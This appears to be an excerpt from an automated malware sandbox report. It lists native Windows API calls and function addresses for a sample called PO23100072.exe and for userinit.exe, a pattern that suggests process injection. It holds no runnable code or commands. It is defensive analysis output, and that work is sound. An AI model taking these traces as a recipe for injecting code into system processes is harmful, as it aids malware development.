            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2DD0 NtDelayExecution,5_2_017E2DD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2DB0 NtEnumerateKey,5_2_017E2DB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2C60 NtCreateKey,5_2_017E2C60
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2C00 NtQueryInformationProcess,5_2_017E2C00
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2CF0 NtOpenProcess,5_2_017E2CF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2CC0 NtQueryVirtualMemory,5_2_017E2CC0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2CA0 NtQueryInformationToken,5_2_017E2CA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2F60 NtCreateProcessEx,5_2_017E2F60
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2F30 NtCreateSection,5_2_017E2F30
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2FE0 NtCreateFile,5_2_017E2FE0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2FB0 NtResumeThread,5_2_017E2FB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2FA0 NtQuerySection,5_2_017E2FA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2F90 NtProtectVirtualMemory,5_2_017E2F90
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2E30 NtWriteVirtualMemory,5_2_017E2E30
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2EE0 NtQueueApcThread,5_2_017E2EE0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2EA0 NtAdjustPrivilegesToken,5_2_017E2EA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2E80 NtReadVirtualMemory,5_2_017E2E80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E3010 NtOpenDirectoryObject,5_2_017E3010
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E3090 NtSetValueKey,5_2_017E3090
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E39B0 NtGetContextThread,5_2_017E39B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E3D70 NtOpenThread,5_2_017E3D70
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E3D10 NtOpenProcessToken,5_2_017E3D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03774340 NtSetContextThread,LdrInitializeThunk,9_2_03774340
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03774650 NtSuspendThread,LdrInitializeThunk,9_2_03774650
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772B60 NtClose,LdrInitializeThunk,9_2_03772B60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03772BF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03772BE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03772BA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772AF0 NtWriteFile,LdrInitializeThunk,9_2_03772AF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772AD0 NtReadFile,LdrInitializeThunk,9_2_03772AD0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772F30 NtCreateSection,LdrInitializeThunk,9_2_03772F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772FE0 NtCreateFile,LdrInitializeThunk,9_2_03772FE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772FB0 NtResumeThread,LdrInitializeThunk,9_2_03772FB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03772EE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03772E80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03772D30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03772D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03772DF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772DD0 NtDelayExecution,LdrInitializeThunk,9_2_03772DD0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03772C70
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772C60 NtCreateKey,LdrInitializeThunk,9_2_03772C60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03772CA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037735C0 NtCreateMutant,LdrInitializeThunk,9_2_037735C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037739B0 NtGetContextThread,LdrInitializeThunk,9_2_037739B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772B80 NtQueryInformationFile,9_2_03772B80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772AB0 NtWaitForSingleObject,9_2_03772AB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772F60 NtCreateProcessEx,9_2_03772F60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772FA0 NtQuerySection,9_2_03772FA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772F90 NtProtectVirtualMemory,9_2_03772F90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772E30 NtWriteVirtualMemory,9_2_03772E30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772EA0 NtAdjustPrivilegesToken,9_2_03772EA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772D00 NtSetInformationFile,9_2_03772D00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772DB0 NtEnumerateKey,9_2_03772DB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772C00 NtQueryInformationProcess,9_2_03772C00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772CF0 NtOpenProcess,9_2_03772CF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03772CC0 NtQueryVirtualMemory,9_2_03772CC0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03773010 NtOpenDirectoryObject,9_2_03773010
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03773090 NtSetValueKey,9_2_03773090
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03773D70 NtOpenThread,9_2_03773D70
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03773D10 NtOpenProcessToken,9_2_03773D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03028F00 NtReadFile,9_2_03028F00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03028D90 NtCreateFile,9_2_03028D90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03029210 NtAllocateVirtualMemory,9_2_03029210
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03029000 NtDeleteFile,9_2_03029000
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030290B0 NtClose,9_2_030290B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 0_2_00E7D3A40_2_00E7D3A4
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004182135_2_00418213
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0042E8E35_2_0042E8E3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0040FA415_2_0040FA41
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0040FA435_2_0040FA43
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004012605_2_00401260
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004023D05_2_004023D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004163EE5_2_004163EE
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004163F35_2_004163F3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0040FC635_2_0040FC63
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004014E05_2_004014E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0040DCE35_2_0040DCE3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_00402F505_2_00402F50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004027305_2_00402730
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018641A25_2_018641A2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018701AA5_2_018701AA
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018681CC5_2_018681CC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A01005_2_017A0100
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184A1185_2_0184A118
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018381585_2_01838158
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018420005_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018703E65_2_018703E6
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE3F05_2_017BE3F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186A3525_2_0186A352
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018302C05_2_018302C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018502745_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018705915_2_01870591
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B05355_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185E4F65_2_0185E4F6
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018544205_2_01854420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018624465_2_01862446
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B07705_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D47505_2_017D4750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AC7C05_2_017AC7C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CC6E05_2_017CC6E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C69625_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0187A9A65_2_0187A9A6
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A05_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BA8405_2_017BA840
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B28405_2_017B2840
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE8F05_2_017DE8F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017968B85_2_017968B8
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01866BD75_2_01866BD7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186AB405_2_0186AB40
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA805_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BAD005_2_017BAD00
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AADE05_2_017AADE0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184CD1F5_2_0184CD1F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C8DBF5_2_017C8DBF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850CB55_2_01850CB5
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0C005_2_017B0C00
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0CF25_2_017A0CF2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182EFA05_2_0182EFA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D0F305_2_017D0F30
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F2F285_2_017F2F28
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BCFE05_2_017BCFE0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A2FC85_2_017A2FC8
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01852F305_2_01852F30
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01824F405_2_01824F40
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186CE935_2_0186CE93
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0E595_2_017B0E59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186EEDB5_2_0186EEDB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186EE265_2_0186EE26
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2E905_2_017C2E90
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179F1725_2_0179F172
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E516C5_2_017E516C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BB1B05_2_017BB1B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0187B16B5_2_0187B16B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185F0CC5_2_0185F0CC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186F0E05_2_0186F0E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018670E95_2_018670E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B70C05_2_017B70C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179D34C5_2_0179D34C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186132D5_2_0186132D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F739A5_2_017F739A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018512ED5_2_018512ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CB2C05_2_017CB2C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B52A05_2_017B52A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184D5B05_2_0184D5B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018675715_2_01867571
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A14605_2_017A1460
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186F43F5_2_0186F43F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186F7B05_2_0186F7B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018616CC5_2_018616CC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B99505_2_017B9950
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CB9505_2_017CB950
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018459105_2_01845910
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181D8005_2_0181D800
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B38E05_2_017B38E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01825BF05_2_01825BF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017EDBF95_2_017EDBF9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186FB765_2_0186FB76
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CFB805_2_017CFB80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01851AA35_2_01851AA3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184DAAC5_2_0184DAAC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185DAC65_2_0185DAC6
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01867A465_2_01867A46
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186FA495_2_0186FA49
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F5AA05_2_017F5AA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01823A6C5_2_01823A6C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B3D405_2_017B3D40
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CFDC05_2_017CFDC0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01861D5A5_2_01861D5A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01867D735_2_01867D73
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186FCF25_2_0186FCF2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01829C325_2_01829C32
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186FFB15_2_0186FFB1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186FF095_2_0186FF09
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B1F925_2_017B1F92
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B9EB05_2_017B9EB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FA3529_2_037FA352
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_038003E69_2_038003E6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0374E3F09_2_0374E3F0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037E02749_2_037E0274
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037C02C09_2_037C02C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037C81589_2_037C8158
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_038001AA9_2_038001AA
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037DA1189_2_037DA118
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037301009_2_03730100
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F81CC9_2_037F81CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F41A29_2_037F41A2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037D20009_2_037D2000
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037407709_2_03740770
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037647509_2_03764750
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0373C7C09_2_0373C7C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0375C6E09_2_0375C6E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_038005919_2_03800591
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037405359_2_03740535
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F24469_2_037F2446
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037E44209_2_037E4420
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037EE4F69_2_037EE4F6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FAB409_2_037FAB40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F6BD79_2_037F6BD7
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0373EA809_2_0373EA80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037569629_2_03756962
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0380A9A69_2_0380A9A6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037429A09_2_037429A0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0374A8409_2_0374A840
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037428409_2_03742840
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0376E8F09_2_0376E8F0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037268B89_2_037268B8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037B4F409_2_037B4F40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03760F309_2_03760F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037E2F309_2_037E2F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03782F289_2_03782F28
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0374CFE09_2_0374CFE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03732FC89_2_03732FC8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037BEFA09_2_037BEFA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03740E599_2_03740E59
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FEE269_2_037FEE26
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FEEDB9_2_037FEEDB
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03752E909_2_03752E90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FCE939_2_037FCE93
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037DCD1F9_2_037DCD1F
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0374AD009_2_0374AD00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0373ADE09_2_0373ADE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03758DBF9_2_03758DBF
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03740C009_2_03740C00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03730CF29_2_03730CF2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037E0CB59_2_037E0CB5
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0372D34C9_2_0372D34C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F132D9_2_037F132D
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0378739A9_2_0378739A
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037E12ED9_2_037E12ED
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0375B2C09_2_0375B2C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037452A09_2_037452A0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0372F1729_2_0372F172
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0377516C9_2_0377516C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0374B1B09_2_0374B1B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0380B16B9_2_0380B16B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F70E99_2_037F70E9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FF0E09_2_037FF0E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037EF0CC9_2_037EF0CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037470C09_2_037470C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FF7B09_2_037FF7B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037856309_2_03785630
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F16CC9_2_037F16CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F75719_2_037F7571
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037DD5B09_2_037DD5B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037314609_2_03731460
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FF43F9_2_037FF43F
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FFB769_2_037FFB76
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037B5BF09_2_037B5BF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0377DBF99_2_0377DBF9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0375FB809_2_0375FB80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037B3A6C9_2_037B3A6C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FFA499_2_037FFA49
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F7A469_2_037F7A46
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037EDAC69_2_037EDAC6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037DDAAC9_2_037DDAAC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03785AA09_2_03785AA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037E1AA39_2_037E1AA3
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037499509_2_03749950
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0375B9509_2_0375B950
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037D59109_2_037D5910
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037AD8009_2_037AD800
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037438E09_2_037438E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FFF099_2_037FFF09
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FFFB19_2_037FFFB1
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03741F929_2_03741F92
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03749EB09_2_03749EB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F7D739_2_037F7D73
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037F1D5A9_2_037F1D5A
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03743D409_2_03743D40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0375FDC09_2_0375FDC0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037B9C329_2_037B9C32
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037FFCF29_2_037FFCF2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030119709_2_03011970
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300AB109_2_0300AB10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300CA909_2_0300CA90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300C86E9_2_0300C86E
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300C8709_2_0300C870
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0301321B9_2_0301321B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030132209_2_03013220
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030150409_2_03015040
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0302B7109_2_0302B710
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A5E3179_2_03A5E317
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A653449_2_03A65344
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A5E7D09_2_03A5E7D0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A5E59B9_2_03A5E59B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A5E4349_2_03A5E434
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A5CAD89_2_03A5CAD8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A5D8389_2_03A5D838
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: String function: 0179B970 appears 280 times
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: String function: 017E5130 appears 58 times
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: String function: 0182F290 appears 105 times
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: String function: 017F7E54 appears 102 times
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: String function: 0181EA12 appears 86 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 03787E54 appears 111 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 03775130 appears 58 times
